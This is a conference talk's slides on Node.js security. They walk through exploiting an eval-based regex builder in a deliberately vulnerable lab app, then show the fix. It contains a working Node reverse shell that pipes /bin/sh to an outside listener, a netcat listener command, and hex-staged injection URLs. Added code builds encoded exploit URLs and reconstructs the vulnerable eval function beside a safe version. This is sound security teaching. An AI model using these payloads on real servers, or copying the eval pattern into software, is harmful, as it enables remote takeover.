Node JS reverse shell

madhuakula 5,192 views 23 slides Jul 16, 2016

About This Presentation

This is the null/OWASP/g4h Bangalore meet presentation.


Slide Content

NODE JS SECURITY
VULNERABILITIES

ABOUT ME
Madhu Akula
Automation Security Ninja at Appsecco
Interested in Security & DevOps
Never ending learner!
@madhuakula

WHAT IS NODE JS?
Node.js is an open-source, cross-platform
runtime environment for developing server-
side Web applications.
Although Node.js is not a JavaScript
framework, many of its basic modules are
written in JavaScript, and developers can
write new modules in JavaScript. The
runtime environment interprets JavaScript
using Google's V8 JavaScript engine.
wikipedia

HELLO WORLD HTTP SERVER IN
NODE JS
var http = require('http'); 
var server = http.createServer(function(req, res) { 
res.writeHead(200); 
res.end('Hello World'); 
}); 
server.listen(2000); 

WHY NODE JS SECURITY?
A lot of applications are moving to JavaScript, especially
with the MEAN (Mongo-Express-Angular-Node) stack.

HOW TO TEST NODE JS SECURITY?
It's similar to normal web application security testing, with
additional checks for JavaScript-specific vulnerabilities.

DEMO TIME

REVERSE SHELL ON A NODE.JS
APPLICATION BY @WIREMASK
POC SETUP

VULNERABLE NODE JS CODE
'use strict' 
const http = require('http'); 
const url = require('url'); 
const path = require('path'); 
const animalsJSON = path.join(__dirname, 'animals.json'); 
const animals = require(animalsJSON); 
function requestHandler(req, res) { 
let urlParams = url.parse(req.url, true); 
let queryData = urlParams.query; 
res.writeHead(200, {"Content-Type": "application/json"}); 

ACCESS THE APPLICATION
http://localhost:3000/?name=do* 

IDENTIFICATION
The stringToRegexp function runs eval on user input to
create a RegExp object, then uses that object to find
elements in an array.
return eval(prefix + output + suffix); // we control output value 

We can insert our own JavaScript code into the output
variable and have it executed. stringToRegexp escapes only
some characters, and the resulting output value is passed
to eval.
http://localhost:3000/?name=["./;require('util').log('Owned');//*"] 

EXPLOIT
(function(){ 
    var net = require("net"), 
        cp = require("child_process"), 
        sh = cp.spawn("/bin/sh", []);               // interactive shell, no arguments
    var client = new net.Socket(); 
    client.connect(8080, "172.28.128.1", function(){ // attacker's netcat listener
        client.pipe(sh.stdin);                      // listener input -> shell stdin
        sh.stdout.pipe(client);                     // shell stdout/stderr -> listener
        sh.stderr.pipe(client);
    });
    return /a/; // hand a RegExp back to the caller so the application keeps running
})();

START NETCAT LISTENER
nc -lvp 8080 

SAMPLE URL
http://localhost:3000/?name=["./;eval(new Buffer('PAYLOAD', 'hex').toString());//*"

HEX PAYLOAD CREATION USING PYTHON
>>> payload = 'nodejs reverse shell JavaScript code'   # Python 2 REPL 
>>> payload.encode('hex') 
In Python 3, str.encode('hex') no longer exists; use payload.encode().hex()
(or binascii.hexlify(payload.encode())) to get the same hex string.

FINAL URL WITH PAYLOAD
http://localhost:3000/?name=["./;eval(new Buffer('<hex payload from the previous step>', 'hex').toString());//*"

CHECK YOUR NETCAT LISTENER
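The staging steps above (hex-encode the shell code in a REPL, paste the hex into the sample URL, check the listener) as one added example in Node rather than Python 2. This is not code from the slides or from the Wiremask write-up; the target base URL, the stage-2 text and the regex used to pull the hex back out are constructed here for illustration. The stager uses Buffer.from, which replaced the new Buffer() constructor shown on the slide (deprecated in Node 10, still accepted), and the query value is percent-encoded with the WHATWG URL API so the quotes, brackets and semicolons in it survive the client and the target's url.parse().

```javascript
'use strict';

// Added example (not from the slides or the Wiremask write-up): hex staging
// of a Node payload and construction of the exploit URL, with a round-trip
// check of what the target's eval would recover. Base URL, stage-2 text and
// the extraction regex below are constructed for illustration.

// Stage 2: the code the target should ultimately run. Constructed; a real
// run would place the reverse-shell IIFE from the Exploit slide here.
const STAGE2 = "require('util').log('Owned'); /a/";

// Hex uses only [0-9a-f], so neither the app's stringToRegexp escaping nor
// URL encoding can alter the staged code.
function hexEncode(js) {
  return Buffer.from(js, 'utf8').toString('hex');
}

// Stage 1: the value that goes into ?name=. Inside the target's eval it
// decodes the hex and evaluates the result. Same shape as the slide's
// ["./;...;//*"] break-out. Buffer.from replaces the slide's new Buffer().
function buildStager(hex) {
  return `["./;eval(Buffer.from('${hex}','hex').toString());//*"]`;
}

// Full URL. URLSearchParams percent-encodes everything outside
// [A-Za-z0-9*-._], so " [ ] ; ' ( ) cannot be mangled in transit.
function buildExploitUrl(base, js) {
  const u = new URL(base);
  u.searchParams.set('name', buildStager(hexEncode(js)));
  return u.toString();
}

// What the target sees after url.parse(req.url, true).query.name, and what
// the stager's Buffer.from(...).toString() reconstructs from it.
function recoverFromUrl(exploitUrl) {
  const name = new URL(exploitUrl).searchParams.get('name');
  const hex = name.match(/Buffer\.from\('([0-9a-f]+)'/)[1]; // constructed extractor
  return { name, stage2: Buffer.from(hex, 'hex').toString('utf8') };
}

if (typeof require !== 'undefined' && require.main === module) {
  const url = buildExploitUrl('http://localhost:3000/', STAGE2);
  console.log(url);
  console.log(recoverFromUrl(url));
}
```

Run it with node and compare the printed URL with the unencoded sample URL on the slide: the raw form only works when the client happens to leave `"`, `[` and `;` alone, while the encoded form is what curl or a browser would send and what the target's query parser decodes back to the original stager.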

CONCLUSION
It's highly recommended to avoid using the eval
function in a JavaScript project. The fix was rather
simple: they started using the RegExp object directly
instead of evaluating a regex literal built from user input.
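As an added example, not the original Wiremask/Appsecco application (whose stringToRegexp is only partly shown on the slides), here is a minimal reconstruction of the eval pattern from the Identification slide beside the fix the Conclusion describes: building the RegExp directly. The animal list, the escaping rules of the unsafe function and the flag-setting payload are assumptions chosen so that the slide's payload shape, `["./;...;//*"]`, breaks out of the regex literal the same way; it runs with plain Node.

```javascript
'use strict';

// Added example (not the original Wiremask/Appsecco app): a reconstruction
// of the eval-based glob-to-RegExp pattern the slides describe, beside the
// fix the Conclusion slide mentions. The original escaping rules are not on
// the slides; the ones below are assumptions that make the slide's payload
// shape work.

// Constructed stand-in for animals.json
const animals = [
  { name: 'dog' }, { name: 'dolphin' }, { name: 'donkey' }, { name: 'cat' },
];

// Vulnerable: build the SOURCE TEXT of a regex literal and eval it. Only
// '[' and ']' are escaped, so a name value of the form
//   ["./;<attacker JS>;//*"]
// becomes   /^\["./;<attacker JS>;//.*"\]$/i   once prefix and suffix are
// glued on: the '/' after the '.' closes the regex literal, the attacker's
// statements execute, and '//' comments out the rest of the line.
function stringToRegexpUnsafe(glob) {
  const prefix = '/^';
  const suffix = '$/i';
  const output = glob
    .replace(/\[/g, '\\[')
    .replace(/\]/g, '\\]')
    .replace(/\*/g, '.*');               // glob wildcard -> regex wildcard
  return eval(prefix + output + suffix); // eslint-disable-line no-eval
}

// Fixed: no eval. Escape every regex metacharacter in the user's text, then
// turn the (now escaped) glob '*' into '.*' and hand the string to the RegExp
// constructor, which can only ever interpret it as a pattern.
function stringToRegexpSafe(glob) {
  const source = glob
    .replace(/[.*+?^${}()|[\]\\]/g, '\\$&')
    .replace(/\\\*/g, '.*');
  return new RegExp('^' + source + '$', 'i');
}

// What the request handler does with ?name=...: filter the array by name.
function findAnimals(stringToRegexp, nameGlob) {
  const re = stringToRegexp(nameGlob);
  return animals.filter((a) => re.test(a.name)).map((a) => a.name);
}

// Constructed payload in the shape of the slide's PoC. Instead of a reverse
// shell it sets a global flag, then leaves a RegExp as the last statement so
// eval still returns something the caller can .test() and the request
// succeeds (the same reason the real exploit hands a regex back).
const PAYLOAD = '["./;globalThis.pwned=true;/./;//*"]';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('do* (unsafe):', findAnimals(stringToRegexpUnsafe, 'do*'));
  console.log('do* (safe):  ', findAnimals(stringToRegexpSafe, 'do*'));
  console.log('payload (safe):  ', findAnimals(stringToRegexpSafe, PAYLOAD),
              'pwned =', globalThis.pwned);
  console.log('payload (unsafe):', findAnimals(stringToRegexpUnsafe, PAYLOAD),
              'pwned =', globalThis.pwned);
}
```

Both functions answer `do*` identically, which is why the bug is easy to miss in functional testing. With the payload, the unsafe path sets the flag and still returns every animal (eval's completion value is the trailing `/./`), while the safe path treats the whole string as literal text and matches nothing. Because the hardened version escapes every metacharacter before appending `.*`, the user also cannot smuggle in nested quantifiers, which is the remaining concern (ReDoS) whenever user text reaches `new RegExp`.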

WANT TO TRY IT YOURSELF?
https://github.com/appsecco/vulnerable-apps
docker run -p 3000:3000 -d appsecco/node-reverse-shell 

PLAYGROUND FOR NODEJS
VULNERABILITIES
DAMN VULNERABLE NODE APPLICATION
Ansible Playbook & Docker

NODE JS SECURITY REFERENCES
https://www.npmjs.com/package/helmet
https://blog.risingstack.com/node-js-security-checklist/
https://nodesecurity.io/resources
https://groups.google.com/forum/#!forum/nodejs-sec

THANK YOU
Q&A
@MADHUAKULA